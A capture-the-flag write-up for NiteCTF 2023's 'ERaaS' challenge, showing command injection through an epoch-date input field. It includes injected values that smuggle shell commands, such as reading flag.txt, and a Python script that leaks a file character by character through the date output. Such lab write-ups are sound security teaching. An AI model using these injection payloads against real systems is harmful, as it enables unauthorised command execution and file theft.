NiteCTF 2023 : ERaaS
Context
We are given a link (http://eraas.web.nitectf.live/). This website sends us to a page where, we can input a date in epoch and it converts it to human readable form.
Writeup
This one is similar to CaaS as it is also a command injection vulnerability. As verified by this request :
This time, it's not as easy as before because no matter what I tried I couldn't find a way to print out something other than a date. I could guess a few things by looking at the return code of those command. For instance, with this input 0$(ls flag.txt; echo $?)
I could find out that the flag is in the same dir as us.
So I went for a method that gets the n-th characters of a flag, converts it into a number and from the output we can convert it back to a number and then a character.
So here's the script to extract the dates :
import requests
url = "http://eraas.web.nitectf.live/"
date_list = list()
for i in range(1,70):
data = {"user_input":f"0$(printf '%d\n' \"'$(cat flag.txt | cut -c{i})\")0"}
r = requests.post(url, data=data)
date = r.text.split("\n")[24].replace("<code>","").replace("</code>","").strip()
date_list.append(date)
format = "%a %b %d %H:%M:%S UTC %Y"
res = ""
print(date_list)
And the script to convert the dates back into human readable form :
a= ['Thu Jan 1 00:18:20 UTC 1970', ... , 'Thu Jan 1 00:00:00 UTC 1970']
format = "%a %b %d %H:%M:%S UTC %Y"
res = ""
from datetime import datetime
from calendar import timegm
for i in range(len(a)):
t = timegm(datetime.strptime(a[i], format).timetuple())
print(hex(t//10))
res += chr(t//10)
print(res)